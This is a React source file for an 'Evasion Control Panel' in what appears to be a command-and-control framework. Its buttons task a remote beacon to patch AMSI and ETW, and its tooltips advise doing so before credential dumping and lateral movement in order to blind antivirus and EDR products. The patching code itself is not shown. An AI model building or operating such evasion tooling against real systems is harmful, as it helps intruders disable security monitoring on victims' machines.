import React, { useState, useEffect } from 'react';
import { Card, Badge, Button, Alert, ProgressBar, Row, Col, OverlayTrigger, Tooltip } from 'react-bootstrap';
import { useTheme } from '../../contexts/ThemeContext';
import c2Service from '../../services/c2Service';

/**
 * EvasionPanel - Real-time evasion status and control panel
 *
 * Features:
 * - Live AMSI/ETW bypass status
 * - One-click evasion activation
 * - Visual indicators with animations
 * - Beacon-specific evasion control
 */
const EvasionPanel = ({ beaconId, onEvasionComplete }) => {
  const { darkMode } = useTheme();
  const [evasionStatus, setEvasionStatus] = useState({
    amsi_patched: false,
    etw_patched: false,
    last_check: null
  });
  const [loading, setLoading] = useState(false);
  const [error, setError] = useState(null);
  const [success, setSuccess] = useState(null);

  // Check evasion status on mount
  useEffect(() => {
    checkEvasionStatus();
  }, [beaconId]);

  // Check current evasion status
  const checkEvasionStatus = async () => {
    try {
      const response = await c2Service.createTask(beaconId, {
        command: 'evasion_status',
        args: {}
      });

      // Parse status from output (will be updated when backend returns structured data)
      // For now, we'll simulate the response
      setEvasionStatus({
        amsi_patched: false,
        etw_patched: false,
        last_check: new Date()
      });
    } catch (err) {
      console.error('Failed to check evasion status:', err);
    }
  };

  // Patch AMSI only
  const patchAMSI = async () => {
    setLoading(true);
    setError(null);
    setSuccess(null);

    try {
      const response = await c2Service.createTask(beaconId, {
        command: 'patch_amsi',
        args: {}
      });

      setSuccess('✓ AMSI successfully patched - PowerShell AV scanning disabled');
      setEvasionStatus(prev => ({ ...prev, amsi_patched: true }));

      if (onEvasionComplete) {
        onEvasionComplete({ amsi: true, etw: evasionStatus.etw_patched });
      }
    } catch (err) {
      setError(`AMSI patch failed: ${err.message}`);
    } finally {
      setLoading(false);
    }
  };

  // Patch ETW only
  const patchETW = async () => {
    setLoading(true);
    setError(null);
    setSuccess(null);

    try {
      const response = await c2Service.createTask(beaconId, {
        command: 'patch_etw',
        args: {}
      });

      setSuccess('✓ ETW successfully patched - EDR telemetry reduced');
      setEvasionStatus(prev => ({ ...prev, etw_patched: true }));

      if (onEvasionComplete) {
        onEvasionComplete({ amsi: evasionStatus.amsi_patched, etw: true });
      }
    } catch (err) {
      setError(`ETW patch failed: ${err.message}`);
    } finally {
      setLoading(false);
    }
  };

  // Patch both AMSI and ETW
  const patchBoth = async () => {
    setLoading(true);
    setError(null);
    setSuccess(null);

    try {
      const response = await c2Service.createTask(beaconId, {
        command: 'patch_both',
        args: {}
      });

      setSuccess('✓ AMSI and ETW successfully patched - Maximum evasion achieved');
      setEvasionStatus({ amsi_patched: true, etw_patched: true, last_check: new Date() });

      if (onEvasionComplete) {
        onEvasionComplete({ amsi: true, etw: true });
      }
    } catch (err) {
      setError(`Evasion patch failed: ${err.message}`);
    } finally {
      setLoading(false);
    }
  };

  // Calculate evasion score (0-100%)
  const evasionScore = () => {
    let score = 0;
    if (evasionStatus.amsi_patched) score += 50;
    if (evasionStatus.etw_patched) score += 50;
    return score;
  };

  const score = evasionScore();

  return (
    <Card className={`border-0 shadow-sm ${darkMode ? 'bg-dark text-light' : ''}`}>
      <Card.Header className="bg-gradient" style={{
        background: 'linear-gradient(135deg, #667eea 0%, #764ba2 100%)',
        color: 'white'
      }}>
        <div className="d-flex justify-content-between align-items-center">
          <div>
            <i className="fas fa-shield-alt me-2"></i>
            <strong>Evasion Control Panel</strong>
          </div>
          <Badge bg={score === 100 ? 'success' : score > 0 ? 'warning' : 'secondary'}>
            {score}% Evasion
          </Badge>
        </div>
      </Card.Header>

      <Card.Body>
        {/* Evasion Score Progress Bar */}
        <div className="mb-4">
          <div className="d-flex justify-content-between mb-2">
            <small className="text-muted">Evasion Level</small>
            <small className="text-muted">{score}%</small>
          </div>
          <ProgressBar
            now={score}
            variant={score === 100 ? 'success' : score > 0 ? 'warning' : 'danger'}
            animated={loading}
          />
        </div>

        {/* Status Indicators */}
        <Row className="mb-4">
          <Col md={6}>
            <Card className={`border-2 ${evasionStatus.amsi_patched ? 'border-success' : 'border-danger'} mb-3 ${darkMode ? 'bg-dark' : ''}`}>
              <Card.Body>
                <div className="d-flex align-items-center">
                  <div className={`status-icon me-3 ${evasionStatus.amsi_patched ? 'status-active' : 'status-inactive'}`}>
                    <i className="fas fa-shield-virus fa-2x"></i>
                  </div>
                  <div className="flex-grow-1">
                    <OverlayTrigger
                      placement="top"
                      overlay={
                        <Tooltip>
                          <div className="text-start" style={{ maxWidth: '300px' }}>
                            <strong>AMSI (Anti-Malware Scan Interface)</strong><br/>
                            Windows security feature that scans PowerShell commands and scripts in real-time.<br/><br/>
                            <strong>When to activate:</strong><br/>
                            • Before running PowerShell scripts<br/>
                            • Before credential dumping<br/>
                            • When executing obfuscated code<br/><br/>
                            <strong>Impact:</strong> Bypasses Windows Defender and most AVs for PowerShell operations.
                          </div>
                        </Tooltip>
                      }
                    >
                      <h6 className="mb-1" style={{ cursor: 'help' }}>
                        AMSI Bypass <i className="fas fa-info-circle text-muted" style={{ fontSize: '0.8em' }}></i>
                      </h6>
                    </OverlayTrigger>
                    <Badge bg={evasionStatus.amsi_patched ? 'success' : 'danger'}>
                      {evasionStatus.amsi_patched ? '✓ Active' : '○ Inactive'}
                    </Badge>
                  </div>
                </div>
                <small className={darkMode ? 'text-light' : 'text-muted'} style={{ display: 'block', marginTop: '8px' }}>
                  Disables PowerShell AV scanning
                </small>
              </Card.Body>
            </Card>
          </Col>

          <Col md={6}>
            <Card className={`border-2 ${evasionStatus.etw_patched ? 'border-success' : 'border-danger'} mb-3 ${darkMode ? 'bg-dark' : ''}`}>
              <Card.Body>
                <div className="d-flex align-items-center">
                  <div className={`status-icon me-3 ${evasionStatus.etw_patched ? 'status-active' : 'status-inactive'}`}>
                    <i className="fas fa-eye-slash fa-2x"></i>
                  </div>
                  <div className="flex-grow-1">
                    <OverlayTrigger
                      placement="top"
                      overlay={
                        <Tooltip>
                          <div className="text-start" style={{ maxWidth: '300px' }}>
                            <strong>ETW (Event Tracing for Windows)</strong><br/>
                            Windows logging system used by EDR/XDR solutions to monitor system activity.<br/><br/>
                            <strong>When to activate:</strong><br/>
                            • Before lateral movement<br/>
                            • When executing sensitive commands<br/>
                            • To avoid EDR detection<br/><br/>
                            <strong>Impact:</strong> Blinds EDR solutions like Windows Defender ATP, CrowdStrike, SentinelOne.
                          </div>
                        </Tooltip>
                      }
                    >
                      <h6 className="mb-1" style={{ cursor: 'help' }}>
                        ETW Patching <i className="fas fa-info-circle text-muted" style={{ fontSize: '0.8em' }}></i>
                      </h6>
                    </OverlayTrigger>
                    <Badge bg={evasionStatus.etw_patched ? 'success' : 'danger'}>
                      {evasionStatus.etw_patched ? '✓ Active' : '○ Inactive'}
                    </Badge>
                  </div>
                </div>
                <small className={darkMode ? 'text-light' : 'text-muted'} style={{ display: 'block', marginTop: '8px' }}>
                  Reduces EDR telemetry
                </small>
              </Card.Body>
            </Card>
          </Col>
        </Row>

        {/* Alert Messages */}
        {error && (
          <Alert variant="danger" dismissible onClose={() => setError(null)}>
            <i className="fas fa-exclamation-triangle me-2"></i>
            {error}
          </Alert>
        )}

        {success && (
          <Alert variant="success" dismissible onClose={() => setSuccess(null)}>
            {success}
          </Alert>
        )}

        {/* Action Buttons */}
        <div className="d-grid gap-2">
          {score === 100 ? (
            <Alert variant="success" className="mb-0">
              <i className="fas fa-check-circle me-2"></i>
              <strong>Maximum evasion active</strong> - All patches applied
            </Alert>
          ) : (
            <>
              <Button
                variant="primary"
                size="lg"
                onClick={patchBoth}
                disabled={loading || score === 100}
              >
                {loading ? (
                  <>
                    <span className="spinner-border spinner-border-sm me-2"></span>
                    Patching...
                  </>
                ) : (
                  <>
                    <i className="fas fa-rocket me-2"></i>
                    Activate Full Evasion (Recommended)
                  </>
                )}
              </Button>

              <Row className="g-2">
                <Col>
                  <Button
                    variant="outline-primary"
                    className="w-100"
                    onClick={patchAMSI}
                    disabled={loading || evasionStatus.amsi_patched}
                  >
                    <i className="fas fa-shield-virus me-2"></i>
                    AMSI Only
                  </Button>
                </Col>
                <Col>
                  <Button
                    variant="outline-primary"
                    className="w-100"
                    onClick={patchETW}
                    disabled={loading || evasionStatus.etw_patched}
                  >
                    <i className="fas fa-eye-slash me-2"></i>
                    ETW Only
                  </Button>
                </Col>
              </Row>

              <Button
                variant="outline-secondary"
                size="sm"
                onClick={checkEvasionStatus}
                disabled={loading}
              >
                <i className="fas fa-sync me-2"></i>
                Refresh Status
              </Button>
            </>
          )}
        </div>

        {/* OPSEC Warning */}
        {score === 0 && (
          <Alert variant="warning" className="mt-3 mb-0">
            <i className="fas fa-exclamation-circle me-2"></i>
            <strong>OPSEC Notice:</strong> No evasion active. Consider activating before running PowerShell scripts or sensitive commands.
          </Alert>
        )}

        {/* Last Check Timestamp */}
        {evasionStatus.last_check && (
          <div className="text-center mt-3">
            <small className={darkMode ? 'text-light' : 'text-muted'}>
              Last checked: {new Date(evasionStatus.last_check).toLocaleString()}
            </small>
          </div>
        )}
      </Card.Body>

      <style jsx>{`
        .status-icon {
          width: 60px;
          height: 60px;
          display: flex;
          align-items: center;
          justify-content: center;
          border-radius: 50%;
          transition: all 0.3s ease;
        }

        .status-active {
          background: linear-gradient(135deg, #10b981 0%, #059669 100%);
          color: white;
          animation: pulse 2s infinite;
        }

        .status-inactive {
          background: #f3f4f6;
          color: #9ca3af;
        }

        @keyframes pulse {
          0%, 100% {
            box-shadow: 0 0 0 0 rgba(16, 185, 129, 0.7);
          }
          50% {
            box-shadow: 0 0 0 10px rgba(16, 185, 129, 0);
          }
        }

        .bg-gradient {
          animation: gradient-shift 3s ease infinite;
          background-size: 200% 200%;
        }

        @keyframes gradient-shift {
          0% { background-position: 0% 50%; }
          50% { background-position: 100% 50%; }
          100% { background-position: 0% 50%; }
        }
      `}</style>
    </Card>
  );
};

export default EvasionPanel;
